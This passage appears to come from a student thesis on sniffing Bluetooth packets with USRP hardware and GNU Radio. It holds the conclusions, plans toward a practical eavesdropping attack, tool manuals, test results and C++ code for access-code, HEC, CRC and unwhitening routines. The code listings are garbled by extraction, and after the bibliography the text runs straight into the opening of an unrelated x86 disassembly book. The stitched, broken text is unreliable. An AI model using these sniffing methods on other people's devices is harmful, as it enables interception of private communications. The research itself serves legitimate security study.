bits of the clock, can be extracted from the demodulated packets.
It would be useful to have a well designed object oriented version of the
software which could handle multiple connections and give stats about the
CHAPTER 7. CONCLUSIONS 42
devices operating in range of the USRP. This would be a valuable extension
to the project to enable it to be reasonably used as a tool for attacking Blue-
tooth communications, but it was not the focus of this project.
The project sets out to expose the security flaws of Bluetooth and show
that it is possible to sniff the packets, as it is with any wireless protocol. This
task needed to be done in order to enable a practical attack to be performed.
7.4 Where does this leave Bluetooth, GNU
Radio and the USRP?
This work brings Bluetooth hacking to a new position where it is closer than
ever before to a practical attack on the protocol itself, rather than exploiting
the flaws of particular implementations. The USRP hardware is not out of
reach for the average attacker, and this means that it is a very real threat.
The GNU Radio project will now have the code for this project con-
tributed to their resources, so that a full implementation and a practical
attack can be attempted in an open source environment, giving any attacker
the same advantages. The research will hopefully contribute to the view
that no wireless protocol is safe from packet sniffing, and frequency hopping
spread spectrum is not a security technique, it is merely a method for reduc-
ing interference.
Bluetooth is an extremely prevalent technology, and it will continue to
be used for more and more data transfer, but with new versions will come
new security measures, meaning that sniffing packets is only the first step to
exploiting protocols at higher levels of the stack.
Chapter 8
Further work
Now that the GNU Radio can receive packets from a Bluetooth connection
there are only a small number of functions to implement in order to perform
an attack. These are finding the clock value of a device, which can be done in
a number of ways described below. With the clock found, an attack should
be relatively simple to carry out.
8.1 Gathering more data from sniffed packets
A single packet can currently yield the LAP and, if the packet has a CRC,
the UAP and six bits of the clock; but there may be more information that
can be gathered. An FHS packet contains all of the information needed to
follow the hopping pattern and remove the whitening of the packets, but it
is only ever sent at the time of a connection establishment.
Once the UAP has been discovered then packets can be read, and the
clock change between them noted, thus giving the time between packets
received so that their place in the communication can be calculated. It will
also allow a more accurate guess at the clock input to remove the whitening
from the data, which should speed up the interpretation of the signal.
43
CHAPTER 8. FURTHER WORK 44
8.2 Hopping
Hopping is the only major hurdle left to a successful attack against a device,
and for this the clock signal is needed. Once the clock signal and address have
been found then the hopping pattern for the device can be discovered. The
hopping pattern can be calculated from only the UAP and LAP parts of the
address, and all 27 bits of the clock signal. The algorithm that determines
the frequency of the next hop is described in section 2.6.2 of the Bluetooth
spec[ 7].
8.3 Using commodity hardware
At the time of writing the GNU Radio hardware costs around $700 plus
an additional $275 per RFX-2400 daugtherboard[ 17]. This is not too much
for anyone who wishes to listen to the Bluetooth communications of others,
especially if there is financial gain to be had. However, the security of the
technology cannot really be said to have been compromised until commu-
nications can be sniffed with commodity hardware; this requires an attack
using only the $3 Bluetooth chip built into a device. In April 2007 a CSR
based device was reportedly turned into a Bluetooth sniffer using firmware
taken from a commercial sniffing tool[ 18]. However this is unconfirmed and
the capabilities are not known; if this can provide all of the functions that
are required to snoop a communication then it could be used to replace the
GNU Radio for an attack.
8.4 Mounting an attack
The overall goal of this, and all Bluetooth security research, is a successful
attack mounted against arbitrary devices, preferably using commodity hard-
ware. However, all of the above problems need to be solved before this can
happen. The USRP seems well suited to the task of sniffing packets, but the
precise timing required for transmission and reception on the same device
may prove impossible with the current GNU Radio framework. One option
CHAPTER 8. FURTHER WORK 45
to avoid this problem is to use the USRP to sniff packets and discover the
MAC/clock values, and then use the bccmd tool to configure a device with
these parameters so that it will follow the hopping pattern and be able to
snoop the entire communication.
Appendix A
System manual
This document describes the way in which the tools that have been written work.
It is intended for anyone who wishes to modify or use any of the tools. For a guide
to running the tools, see the User Guide.
A.1 Command line tools
A.1.1 bccmd
The modifications to bccmd were to add a ”radiotest” function, which was mostly
a direct copy of ”rttxdata1” but instead of hard setting the TestID value, it is taken
from the third command line argument. A ”pktconfig” mode was added to allow
the length and type of the test packets to be altered, this is based on the radiotests
with a TestID of 23.
A.1.2 packet finder
Thepacket finder has a hardcoded LAP, which is used to calculate an access
code. This access code is then used to compare to the input stream of data. The
findac method allows for up to five errors in the access code to allow for trans-
mission and demodulation errors. This was designed to only find the DH1 packets
from the CSR test mode, so it does not deal with any payload types other than
46
APPENDIX A. SYSTEM MANUAL 47
DH1, and does not handle with whitened data.
A.1.3 packet sniffer
Thepacket sniffer is a modified version of the packet finder . In the find ac
function it takes the LAP from the access code, then creates an access code
based on the LAP, before checking that this matches what was read in. Un-
like packet finder it does not allow any errors. This does not seem to cause any
problems with reception as a large number of the test packets get through. The
packet sniffer is not intended to be used for anything but a proof of concept of the
methods to be used in the GNU Radio block listed below.
A.2 GNU Radio Bluetooth (gr-bluetooth)
A.2.1 sniffer
Thesniffer module is a version of the packet sniffer above modified to fit within
a GNU Radio flow graph. The main function is replaced by the standard work
function of GNU Radio’s gr sync block.
A.2.2 bluetooth LAP sniffer.py
TheLAP module is designed to only snoop LAPs of the devices working in range,
it exits after a time if no new LAPs have been found. It will not exit if no LAPs
have been found.
A.2.3 bluetooth sniffer.py
bluetooth sniffer.py combines the USRP input, GMSK demodulator and snif-
ferlisted above. Acts as a packet sniffer for Bluetooth packets (although doesn’t
seem work for anything but the CSR test packets at present). It is mainly used to
APPENDIX A. SYSTEM MANUAL 48
test the sniffer , but also to be more simple to execute than packet sniffer .
A.2.4 file sniffer.py
filesniffer.py is similar to bluetooth sniffer.py except that it does not use the
USRP for input, it is useful when checking sampled files from the radio in order
to compare the output of sniffer topacket sniffer . Unlike packet sniffer it
takes complex files, and therefore passes the files through the demodulator before
processing.
Appendix B
User manual
A guide to the tools that have been written or modified whilst attempting to re-
ceive Bluetooth packets with USRP hardware. For a more in depth description of
how the tools work, see the System Guide.
B.1 Command line tools
B.1.1 bccmd
bccmd is a tool that comes as part of the bluez linux Bluetooth stack. It allows
some fairly direct control over the Cambridge Silicon Radio chips used in a number
of Bluetooth devices. One of the options is a radio test mode, this sends one of the
transmission tests repeatedly. There are alternative transmission tests, and these
can be useful to access, so this has been added. A packet confing mode has been
to allow the length and type of the test packets to be changed.
The extra options are used as follows:
bccmd radiotest freq level TestID
Where:
freq is the frequency to broadcast the test packets on in MHz, between 2401 and
2479.
level is the volume for transmission, values between 0x0000 and 0x003f are rec-
ommended.
TestID is the numerical ID of the test, 4, 6 and 7 are useful transmission tests.
49
APPENDIX B. USER MANUAL 50
bccmd pktconfig type length
Where:
type is the identifier of the packet type, e.g. 3 is DM1, 4 is DH1, 7 is EV3.
length is the length in bytes of the data in the payload.
B.1.2 packet finder
packet finder is a tool to print out statistics of all packets in a data stream for a
given LAP. This allows us to check that the access code is correct before attempt-
ing to gather information from the rest of the packet. As input it takes a binary
file packed 1 bit per byte (the least significant bit of the byte), this is the standard
output of the GNUradio GMSK demodulator.
The format of the command is: ./packet finder inputfile
The program will exit when it reaches the end of the file. If the start of a packet
is found, but the end is cut off, an exit code of 1 will be given.
B.1.3 packet sniffer
Whilst packet finder will find all packets with an access code based on the given
LAP, we may not know the LAP of the device we wish to sniff packets from. This
is where packet sniffer comes in. It scans through the input stream to find the
preamble and trailer of an access code, and then checks that the LAP portion
creates the codeword portion of the syncword.
As input it takes a binary file packed 1 bit per byte (the least significant bit of the
byte), this is the standard output of the GNUradio GMSK demodulator.
The format of the command is: ./packet sniffer inputfile
The program will exit when it reaches the end of the file. If the start of a packet
is found, but the end is cut off, an exit code of 1 will be given.
APPENDIX B. USER MANUAL 51
B.2 GNU Radio Bluetooth (gr-bluetooth)
B.2.1 sniffer
The Bluetooth packet sniffer block for GNU Radio is based on the packet sniffer
command line tool. It takes demodulated data from the GMSK block and searches
for possible access codes, then it attempts to gather as much information as pos-
sible about each packet before printing it to the screen.
B.2.2 bluetooth sniffer.py
bluetooth sniffer.py is a script that links the USRP input to the GMSK demod-
ulator and then passes this to Bluetooth sniffer block.
It is used as follows:
gr-bluetooth/examples/bluetooth sniffer.py -f freq -g gain
Where freq is the frequency to listen on, and gain is the gain to be applied to the
incoming signal.
B.2.3 file sniffer.py
filesniffer.py is a script to pipe a file into the sniffer block instead of taking
the input from the radio device and the demodulator. This is useful for debugging
when used in conjunction with a file that is known to contain packets as it removes
errors that come with noise.
It is used as follows:
gr-bluetooth/examples/file sniffer.py inputfile
B.3 Frequency / gain
B.3.1 Frequency
All values of frequency are valid between 2401MHz and 2479MHz, the transmis-
sions are supposed to be at 1MHz intervals, but there may be inaccuracy and drift,
APPENDIX B. USER MANUAL 52
this can be identified using the gnuradio-examples/python/usrp/usrp fft.py
which displays a plot of the frequency distribution of the signal.
B.3.2 Gain
The gain needs to be set such that the signal appears roughly like this:
With the settings at 50us and 1k per division, the signal should stretch between
the +1000 and -1000 lines.
Appendix C
Test results
C.1 Packet codes and error checks
C.1.1 acgen()
All of the 130 LAPs from volume 2, part G, section 3 of the Bluetooth spec-
ification v1.2[ 7] were given as input to the acgen() function. The expected
output was then taken from the same section of the spec, copied into a file.
The output from acgen test was formatted to the same style as the output
in the spec, and was saved to file. The two files were then compared with the
difftool and no differences were found. All 130 access codes were generated
correctly.
C.1.2 hecgen()
The specification gives 20 sample packet headers with HEC, these were used
to test the hecgen() function. The function was also tested by checking the
HEC on the CSR test packets when they were received.
C.1.3 crcgen()
The specification only contains one piece of sample data for testing CRC
calculations. This was tested, and the crcgen test program produced the
correct output. However this was no conclusive enough, and further testing
53
APPENDIX C. TEST RESULTS 54
was provided by the test packets sent from the CSR device. The packets had
a fixed UAP which was known, so the crcgen() was included in the code to
extract data from them; it was used to check that the CRC present at the
end of the packet was correct given the data in the payload. It was able to
check all of the packets presented to it, and identified correct packets, and
also rejected packets with errors present.
C.2 Packet sniffing and data extraction
C.2.1 sniff ac()
sniff ac() is able to find packets in a stream of data, finding all packets that
have no errors in the access code. This could be extended to allow for a
small number of bit errors in the access code, but the speed of execution is
considered more important.
C.2.2 UAP from hec()
All HECs produced by hecgen() were able to be reversed, given the appropri-
ate header data, to reveal the correct UAP for the packet. The correct UAP
was given when the CSR test packets were passed to the function, which
confirmed the test.
C.2.3 unwhiten()
The unwhitening tool was implemented twice, once as the specification showed,
with an LFSR, this was then tested against the sample data given. The sec-
ond version was created directly from the sample data as a lookup table, this
was tested againt the first implementation to ensure that it produced the
correct results.
Appendix D
Interim report
D.1 Progress made to date
Most of the effort so far has gone into reading the specifications of Blue-
tooth and the Universal Software Radio Peripheral (USRP). The Bluetooth
protocol involves some interesting radio techniques in order to minimise in-
terference in an already crowded frequency band (2.4GHz), these techniques
need to be implemented using the USRP. Some of them have already been im-
plemented, others have not, although it is possible that these are constrained
by the current hardware in the USRP.
The software of choice for the USRP is the GNU Radio project, an pen
source software defined radio package closely related to the USRP device.
The processing of signals is mostly performed by c++ ”blocks” which are
connected together in a graph by python. This has involved getting to grips
with python and c++, but this has not been a problem.
The USRP allowed a chance to experiment with recieving signals and
processing them. This was more difficult than expected due to lack of expe-
rience with radio technologies, but it is now possible to record a signal and
pass it to the demodulator using the GNU Radio framework.
This signal currently includes a lot of noise which needs to be eliminated
55
APPENDIX D. INTERIM REPORT 56
using filters supplied by the GNU Radio software. The Bluetooth specifica-
tion also states that certain packet types have repetition, and this can be
used to calculate the correct demodulation of the signal.
APPENDIX D. INTERIM REPORT 57
D.2 Further work
There’s a lot of work still to be done, most of which will involve processing the
packets from the demodulator stage onwards. This can be achieved within
the context of the flowgraph using modules written in c++.
•The next stage is to identify the Bluetooth packets being received by
the software, and identify/classify them (expected completion: End of
January). I will most likely write a Bluetooth version of TCP dump to
do this. This should be able to identify the packets used to establish a
connection:
–ID packets
–FHS packets
–NULL packets
–POLL packets
•Following the successful reception of Bluetooth packets, tramsmission
of packets is the obvious next step, starting with the ID packet (Reading
week).
•The USRP device is unable to change frequencies quickly enough to
synchronise with a device’s hopping pattern, but the protocol allows
the master device to set the hopping pattern. This will make it possible
to communicate with a Bluetooth device, as long as the device allows
itself to be the slave in the connection (End of March, due to exams).
•The inability to hop frequencies quickly will most likely mean that
connections between other devices cannot be eavesdropped, but this
may be possible with future versions of the hardware. For now the
methods for using the USRP to sniff packets will be discussed in the
final report, but they’re unlikely to be implemented (Mostly involves
the writeup, due in April).
Appendix E
Code
E.1 Access code
E.1.1 codeword()
1u i n t 8 t∗bluetooth UAP : : codeword ( u i n t 8 t∗data , int length , int k )
2{
3 int i , j ;
4 u i n t 8 t∗g ,∗cw , feedback ;
5
6 g = ( u i n t 8 t∗) malloc ( 3 5 ) ;
7 g [ 0 ] = 1 ;
8 g [ 1 ] = 0 ;
9 g [ 2 ] = 0 ;
10 g [ 3 ] = 1 ;
11 g [ 4 ] = 0 ;
12 g [ 5 ] = 1 ;
13 g [ 6 ] = 0 ;
14 g [ 7 ] = 1 ;
15 g [ 8 ] = 1 ;
16 g [ 9 ] = 0 ;
17 g [ 1 0 ] = 1 ;
58
APPENDIX E. CODE 59
18 g [ 1 1 ] = 1 ;
19 g [ 1 2 ] = 1 ;
20 g [ 1 3 ] = 1 ;
21 g [ 1 4 ] = 0 ;
22 g [ 1 5 ] = 0 ;
23 g [ 1 6 ] = 1 ;
24 g [ 1 7 ] = 0 ;
25 g [ 1 8 ] = 0 ;
26 g [ 1 9 ] = 0 ;
27 g [ 2 0 ] = 1 ;
28 g [ 2 1 ] = 1 ;
29 g [ 2 2 ] = 1 ;
30 g [ 2 3 ] = 0 ;
31 g [ 2 4 ] = 1 ;
32 g [ 2 5 ] = 0 ;
33 g [ 2 6 ] = 1 ;
34 g [ 2 7 ] = 0 ;
35 g [ 2 8 ] = 0 ;
36 g [ 2 9 ] = 0 ;
37 g [ 3 0 ] = 0 ;
38 g [ 3 1 ] = 1 ;
39 g [ 3 2 ] = 1 ;
40 g [ 3 3 ] = 0 ;
41 g [ 3 4 ] = 1 ;
42
43 cw = ( u i n t 8 t∗) malloc ( 3 4 ) ;
44
45 /∗This s e c t i o n w r i t t e n by
46 Dr Robert Morelos −Zaragoza
47 of San Jose State U n i v e r s i t y ∗/
48
49 for ( i = 0 ; i <length −k ; i++)
50 cw [ i ] = 0 ;
APPENDIX E. CODE 60
51 for ( i = k −1 ; i >= 0 ; i −−){
52 feedback = data [ i ] ˆ cw [ length −k−1 ] ;
53 i f( feedback != 0) {
54 for ( j = length −k−1 ; j >0 ; j −−)
55 i f( g [ j ] != 0)
56 cw [ j ] = cw [ j −1 ] ˆ feedback ;
57 else
58 cw [ j ] = cw [ j −1 ] ;
59 cw [ 0 ] = g [ 0 ] && feedback ;
60 }else {
61 for ( j = length −k−1 ; j >0 ; j −−)
62 cw [ j ] = cw [ j −1 ] ;
63 cw [ 0 ] = 0 ;
64 }
65 }
66 f r e e ( g ) ;
67 return cw ;
68}
E.1.2 acgen()
1/∗Endianness −LAP i s MSB f i r s t ∗/
2u i n t 8 t∗bluetooth UAP : : acgen ( int LAP)
3{
4 u i n t 8 t∗retval , ∗pn , count , ∗cw , ∗data ;
5 r e t v a l = ( u i n t 8 t∗) malloc ( 9 ) ;
6 pn = ( u i n t 8 t∗) malloc ( 9 ) ;
7 data = ( u i n t 8 t∗) malloc ( 3 0 ) ;
8
9 LAP = r e v e r s e ( (LAP & 0 xff0000 ) >>16) |
10 ( r e v e r s e ( (LAP & 0 x00ff00 ) >>8)<<8)|
11 ( r e v e r s e (LAP & 0 x0000ff ) <<16);
12
13 r e t v a l [ 4 ] = (LAP & 0 xc00000) >>22;
APPENDIX E. CODE 61
14 r e t v a l [ 5 ] = (LAP & 0 x3fc000 ) >>14;
15 r e t v a l [ 6 ] = (LAP & 0 x003fc0 ) >>6;
16 r e t v a l [ 7 ] = (LAP & 0 x00003f ) <<2;
17
18 /∗T r a i l e r ∗/
19 i f(LAP & 0x1 )
20 { r e t v a l [ 7 ] |= 0x03 ;
21 r e t v a l [ 8 ] = 0x2a ;
22 }else
23 r e t v a l [ 8 ] = 0xd5 ;
24
25 pn [ 0 ] = 0x03 ;
26 pn [ 1 ] = 0xF2 ;
27 pn [ 2 ] = 0xA3 ;
28 pn [ 3 ] = 0x3D ;
29 pn [ 4 ] = 0xD6 ;
30 pn [ 5 ] = 0x9B ;
31 pn [ 6 ] = 0x12 ;
32 pn [ 7 ] = 0x1C ;
33 pn [ 8 ] = 0x10 ;
34
35 for( count = 4 ; count <9 ; count++)
36 r e t v a l [ count ] ˆ= pn [ count ] ;
37
38 /∗Codeword ∗/
39 //g ( d ) = 0x585713DA9
40 data [ 0 ] = ( r e t v a l [ 4 ] & 0x02 ) > > 1 ;
41 data [ 1 ] = ( r e t v a l [ 4 ] & 0x01 ) ;
42 data [ 2 ] = ( r e t v a l [ 5 ] & 0x80 ) > > 7 ;
43 data [ 3 ] = ( r e t v a l [ 5 ] & 0x40 ) > > 6 ;
44 data [ 4 ] = ( r e t v a l [ 5 ] & 0x20 ) > > 5 ;
45 data [ 5 ] = ( r e t v a l [ 5 ] & 0x10 ) > > 4 ;
46 data [ 6 ] = ( r e t v a l [ 5 ] & 0x08 ) > > 3 ;
APPENDIX E. CODE 62
47 data [ 7 ] = ( r e t v a l [ 5 ] & 0x04 ) > > 2 ;
48 data [ 8 ] = ( r e t v a l [ 5 ] & 0x02 ) > > 1 ;
49 data [ 9 ] = ( r e t v a l [ 5 ] & 0x01 ) ;
50 data [ 1 0 ] = ( r e t v a l [ 6 ] & 0x80 ) > > 7 ;
51 data [ 1 1 ] = ( r e t v a l [ 6 ] & 0x40 ) > > 6 ;
52 data [ 1 2 ] = ( r e t v a l [ 6 ] & 0x20 ) > > 5 ;
53 data [ 1 3 ] = ( r e t v a l [ 6 ] & 0x10 ) > > 4 ;
54 data [ 1 4 ] = ( r e t v a l [ 6 ] & 0x08 ) > > 3 ;
55 data [ 1 5 ] = ( r e t v a l [ 6 ] & 0x04 ) > > 2 ;
56 data [ 1 6 ] = ( r e t v a l [ 6 ] & 0x02 ) > > 1 ;
57 data [ 1 7 ] = ( r e t v a l [ 6 ] & 0x01 ) ;
58 data [ 1 8 ] = ( r e t v a l [ 7 ] & 0x80 ) > > 7 ;
59 data [ 1 9 ] = ( r e t v a l [ 7 ] & 0x40 ) > > 6 ;
60 data [ 2 0 ] = ( r e t v a l [ 7 ] & 0x20 ) > > 5 ;
61 data [ 2 1 ] = ( r e t v a l [ 7 ] & 0x10 ) > > 4 ;
62 data [ 2 2 ] = ( r e t v a l [ 7 ] & 0x08 ) > > 3 ;
63 data [ 2 3 ] = ( r e t v a l [ 7 ] & 0x04 ) > > 2 ;
64 data [ 2 4 ] = ( r e t v a l [ 7 ] & 0x02 ) > > 1 ;
65 data [ 2 5 ] = ( r e t v a l [ 7 ] & 0x01 ) ;
66 data [ 2 6 ] = ( r e t v a l [ 8 ] & 0x80 ) > > 7 ;
67 data [ 2 7 ] = ( r e t v a l [ 8 ] & 0x40 ) > > 6 ;
68 data [ 2 8 ] = ( r e t v a l [ 8 ] & 0x20 ) > > 5 ;
69 data [ 2 9 ] = ( r e t v a l [ 8 ] & 0x10 ) > > 4 ;
70
71 cw = codeword ( data , 64 , 3 0 ) ;
72
73 r e t v a l [ 0 ] = cw [ 0 ] < <3|cw [ 1 ] < <2|
74 cw [ 2 ] < <1|cw [ 3 ] ;
75
76 r e t v a l [ 1 ] = cw [ 4 ] < <7|cw [ 5 ] < <6|
77 cw [ 6 ] < <5|cw [ 7 ] < <4|
78 cw [ 8 ] < <3|cw [ 9 ] < <2|
79 cw [ 1 0 ] < <1|cw [ 1 1 ] ;
APPENDIX E. CODE 63
80
81 r e t v a l [ 2 ] = cw [ 1 2 ] < <7|cw [ 1 3 ] < <6|
82 cw [ 1 4 ] < <5|cw [ 1 5 ] < <4|
83 cw [ 1 6 ] < <3|cw [ 1 7 ] < <2|
84 cw [ 1 8 ] < <1|cw [ 1 9 ] ;
85
86 r e t v a l [ 3 ] = cw [ 2 0 ] < <7|cw [ 2 1 ] < <6|
87 cw [ 2 2 ] < <5|cw [ 2 3 ] < <4|
88 cw [ 2 4 ] < <3|cw [ 2 5 ] < <2|
89 cw [ 2 6 ] < <1|cw [ 2 7 ] ;
90
91 r e t v a l [ 4 ] = cw [ 2 8 ] < <7|cw [ 2 9 ] < <6|
92 cw [ 3 0 ] < <5|cw [ 3 1 ] < <4|
93 cw [ 3 2 ] < <3|cw [ 3 3 ] < <2|
94 ( r e t v a l [ 4 ] & 0x3 ) ;
95 f r e e (cw ) ;
96
97 for( count = 0 ; count <9 ; count++)
98 r e t v a l [ count ] ˆ= pn [ count ] ;
99 f r e e (pn ) ;
100
101 /∗Preamble ∗/
102 i f( r e t v a l [ 0 ] & 0x08 )
103 r e t v a l [ 0 ] |= 0xa0 ;
104 else
105 r e t v a l [ 0 ] |= 0x50 ;
106
107 return r e t v a l ;
108 }
E.1.3 checkac()
1/∗Create an AC and check i t ∗/
2bool bluetooth UAP : : check ac (char ∗stream )
APPENDIX E. CODE 64
3{
4 int count , aclength ;
5 u i n t 8 t∗ac , ∗grdata ;
6 aclength = 72;
7
8 /∗Generate AC ∗/
9 ac = acgen (d LAP ) ;
10
11 /∗Check AC ∗/
12 /∗Convert i t to 1 LSB per byte ∗/
13 grdata = ( u i n t 8 t∗) malloc ( aclength ) ;
14
15 for( count = 0 ; count <9 ; count++)
16 convert togrformat ( ac [ count ] , &grdata [ count ∗8 ] ) ;
17
18 for( count = 0 ; count <aclength ; count++)
19 {
20 i f( grdata [ count ] != stream [ count ] )
21 return 0 ;
22 }
23 return 1 ;
24}
E.1.4 sniffac()
1/∗Looks f o r an AC in the stream ∗/
2int bluetooth UAP : : s n i f f a c ( )
3{
4 int jump , count , counter , s i z e ;
5 char ∗stream = d stream ;
6 int jumps [ 1 6 ] = {3 , 2 , 1 , 3 , 3 , 0 , 2 , 3 , 3 , 2 , 0 , 3 , 3 , 1 , 2 , 3 };
7 s i z e = d stream length ;
8 count = 0 ;
9
APPENDIX E. CODE 65
10 while ( s i z e >72)
11 {
12 jump = jumps [ stream [ 0 ] < <3|stream [ 1 ] < <2|
13 stream [ 2 ] < <1|stream [ 3 ] ] ;
14 i f(0 == jump)
15 {
16 /∗Found the s t a r t , now check the end . . . ∗/
17 counter = stream [ 6 2 ] < <9|stream [ 6 3 ] < <8|
18 stream [ 6 4 ] < <7|stream [ 6 5 ] < <6|
19 stream [ 6 6 ] < <5|stream [ 6 7 ] < <4|
20 stream [ 6 8 ] < <3|stream [ 6 9 ] < <2|
21 stream [ 7 0 ] < <1|stream [ 7 1 ] ;
22
23 i f((0 x0d5 == counter ) | |(0 x32a == counter ) )
24 {
25 i f( check ac ( stream ) )
26 return count ;
27 }
28 jump = 1 ;
29 }
30 count += jump ;
31 stream += jump ;
32 s i z e −= jump ;
33 }
34 return −1;
35}
APPENDIX E. CODE 66
E.2 Header
E.2.1 hecgen()
1/∗Pointer to s t a r t of header , UAP ∗/
2u i n t 8 t hecgen ( char ∗packet , int UAP)
3{
4 char byte ;
5 u i n t 8 t reg , r e t v a l ;
6 int count ;
7
8 reg = UAP & 0 x f f ;
9 byte = ∗packet++;
10
11 for( count = 0 ; count <10; count++)
12 {
13 i f(8==count )
14 byte = ∗packet ;
15
16 reg = ( reg < <1)|( ( ( reg & 0x80 ) > >7)
17 ˆ ( byte & 0x1 ) ) ;
18 byte > >= 1 ;
19
20 /∗Bit 1 ∗/
21 reg ˆ= ( ( reg & 0x01) <<1);
22 /∗Bit 2 ∗/
23 reg ˆ= ( ( reg & 0x01) <<2);
24 /∗Bit 5 ∗/
25 reg ˆ= ( ( reg & 0x01) <<5);
26 /∗Bit 7 ∗/
27 reg ˆ= ( ( reg & 0x01) <<7);
28 }
29 return reg ;
APPENDIX E. CODE 67
30}
E.2.2 UAP from HEC
1/∗Pointer to s t a r t of header , UAP ∗/
2int bluetooth UAP : : UAP from hec ( u i n t 8 t∗packet )
3{
4 char byte ;
5 int count ;
6 u i n t 8 t hec ;
7
8 hec = ∗( packet + 2 ) ;
9 byte = ∗( packet + 1 ) ;
10
11 for( count = 0 ; count <10; count++)
12 {
13 i f(2==count )
14 byte = ∗packet ;
15
16 /∗Bit 1 ∗/
17 hec ˆ= ( ( hec & 0x01) <<1);
18 /∗Bit 2 ∗/
19 hec ˆ= ( ( hec & 0x01) <<2);
20 /∗Bit 5 ∗/
21 hec ˆ= ( ( hec & 0x01) <<5);
22 /∗Bit 7 ∗/
23 hec ˆ= ( ( hec & 0x01) <<7);
24
25 hec = ( hec > >1)|( ( ( hec & 0x01 )
26 ˆ ( byte & 0x01 ) ) < < 7 ) ;
27 byte > >= 1 ;
28 }
29 return hec ;
30}
APPENDIX E. CODE 68
E.2.3 Unwhiten header
1void unwhiten header ( u i n t 8 t∗input , u i n t 8 t∗output , int clock )
2{
3 int count , index ;
4 /∗index i n t o data array ∗/
5 u i n t 8 t i n d i c i e s [ 6 4 ] = {99 , 85 , 17 , 50 , 102 , 58 , 108 , 45 , 92 ,
6 62 , 32 , 118 , 88 , 11 , 80 , 2 , 37 , 69 , 55 , 8 , 20 , 40 ,
7 74 , 114 , 15 , 106 , 30 , 78 , 53 , 72 , 28 , 26 , 68 , 7 , 39 ,
8 113 , 105 , 77 , 71 , 25 , 84 , 49 , 57 , 44 , 61 , 117 , 10 ,
9 1 , 123 , 124 , 22 , 125 , 111 , 23 , 42 , 126 , 6 , 112 , 76 ,
10 24 , 48 , 43 , 116 , 0 };
11
12 /∗whitening data ∗/
13 u i n t 8 t data [ 1 2 7 ] = {1 , 1 , 1 , 0 , 0 , 0 , 1 , 1 , 1 , 0 , 1 , 1 , 0 , 0 ,
14 0 , 1 , 0 , 1 , 0 , 0 , 1 , 0 , 1 , 1 , 1 , 1 , 1 , 0 , 1 , 0 , 1 ,
15 0 , 1 , 0 , 0 , 0 , 0 , 1 , 0 , 1 , 1 , 0 , 1 , 1 , 1 , 1 , 0 , 0 ,
16 1 , 1 , 1 , 0 , 0 , 1 , 0 , 1 , 0 , 1 , 1 , 0 , 0 , 1 , 1 , 0 , 0 ,
17 0 , 0 , 0 , 1 , 1 , 0 , 1 , 1 , 0 , 1 , 0 , 1 , 1 , 1 , 0 , 1 , 0 ,
18 0 , 0 , 1 , 1 , 0 , 0 , 1 , 0 , 0 , 0 , 1 , 0 , 0 , 0 , 0 , 0 , 0 ,
19 1 , 0 , 0 , 1 , 0 , 0 , 1 , 1 , 0 , 1 , 0 , 0 , 1 , 1 , 1 , 1 , 0 ,
20 1 , 1 , 1 , 0 , 0 , 0 , 0 , 1 , 1 , 1 , 1 };
21
22 index = i n d i c i e s [ clock & 0 x3f ] ;
23
24 for( count = 0 ; count <18; count++)
25 {
26 output [ count ] = input [ count ] ˆ data [ index ] ;
27 index += 1 ;
28 index % = 127;
29 }
30}
APPENDIX E. CODE 69
E.3 Payload
E.3.1 crcgen()
1u i n t 1 6 t bluetooth UAP : : crcgen ( char ∗packet , int length , int UAP)
2{
3 char byte ;
4 u i n t 1 6 t reg , count , counter ;
5
6 reg = UAP & 0 x f f ;
7 for( count = 0 ; count <length ; count++)
8 {
9 byte = ∗packet++;
10 for( counter = 0 ; counter <8 ; counter++)
11 {
12 reg = ( reg < <1)|( ( ( reg & 0x8000) >>15)
13 ˆ ( ( byte & 0x80 ) > > 7 ) ) ;
14 byte < <= 1 ;
15
16 /∗Bit 5 ∗/
17 reg ˆ= ( ( reg & 0x0001) <<5);
18
19 /∗Bit 12 ∗/
20 reg ˆ= ( ( reg & 0x0001) <<12);
21 }
22 }
23 return reg ;
24}
APPENDIX E. CODE 70
E.4 Common functions
E.4.1 reverse
1/∗Reverse the b i t s in a byte ∗/
2u i n t 8 t bluetooth UAP : : r e v e r s e ( char byte )
3{
4 return ( byte & 0x80 ) > >7|( byte & 0x40 ) > >5|
5 ( byte & 0x20 ) > >3|( byte & 0x10 ) > >1|
6 ( byte & 0x08 ) < <1|( byte & 0x04 ) < <3|
7 ( byte & 0x02 ) < <5|( byte & 0x01 ) < < 7 ;
8}
E.4.2 convert to one LSB per byte format
1void bluetooth UAP : : convert togrformat
2 ( u i n t 8 t input , u i n t 8 t∗output )
3{
4 int count ;
5 for( count = 0 ; count <8 ; count++)
6 {
7 output [ count ] = ( input & 0x80 ) > > 7 ;
8 input < <= 1 ;
9 }
10}
Bibliography
[1]http://www.bluetooth.org
[2]Busy as a ZigBee, Jon Adams and Bob Heile
[3]http://standards.ieee.org/getieee802/download/802.15.4-2006.pdf
[4]A Preliminary Investigation of Worm Infections in a Bluetooth Environ-
ment by Jing Su, Kelvin K. W. Chan, Andrew G. Miklas, Kenneth Po,
Ali Akhavan, Stefan Saroiu, Eyal de Lara, Ashvin Goel
[5]M. Jakobsson and S. Wetzel. Security Weaknesses in Bluetooth. CT-
RSA 2001: Proceedings of the 2001 Conference on Topics in Cryptology,
pages 176191, 2001. LNCS 2020.
[6]https://programs.bluetooth.org/apps/faq/faq details.aspx?fid=98
[7]Bluetooth Core Specification v1.2, Bluetooth Special Interest Group
[8]http://www.ettus.com/downloads/transceiver dbrds v3b.pdf
[9]http://www.bluez.org
[10]http://www.opencores.org/projects.cgi/web/bluetooth/overview
[11]email from Matt Ettus, designer of the USRP,
http://lists.hpsdr.org/pipermail/hpsdr-hpsdr.org/2006-
November/002997.html
[12]United States Patent 6941110, Kloper, David S., Diener, Neil R.,
Cognio, Inc.
71
BIBLIOGRAPHY 72
[13]Yaniv Shaked, Avishai Wool (2005-06). ”Cracking the
Bluetooth PIN”. School of Electrical Engineering Systems
http://www.eng.tau.ac.il/ yash/shaked-wool-mobisys05/index.html
[14]http://trifinite.org/trifinite stuff.html
[15]http://www.fte.com/getFTS4BT/
[16]standards.ieee.org/regauth/oui/oui.txt
[17]http://www.ettus.com/
[18]Busting The Bluetooth Myth Getting RAW Access, by Max Moserx86Disassembly
ExploringtherelationshipbetweenC,x86Assembly,andMachine
Code
Contents
0.1 Preface . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
0.1.1 WhatisWikibooks? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
